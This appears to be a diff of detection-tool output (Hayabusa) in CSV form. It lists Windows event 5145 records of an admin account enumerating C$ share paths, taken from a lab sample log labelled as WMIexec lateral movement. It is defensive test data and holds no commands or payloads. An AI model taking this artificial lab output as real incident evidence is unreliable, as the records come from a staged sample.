+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\pt  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\pt-BR  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\ro  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\ru  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\sk  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\sl  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\sr-Latn-RS  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.447 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\sv  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\th  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\tr  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\uk  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\zh-HANS  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\zh-HANT  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\zh-HK  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\AppCompat  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\AppCompat\Programs\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\AppCompat\Programs  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\AppCompat\Programs\DevInvCache  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\apppatch  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\apppatch\apppatch64  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\apppatch\Custom  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\apppatch\Custom\Custom64  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\apppatch\en-US  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\AppReadiness  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_32\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_64\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_32  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_64  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
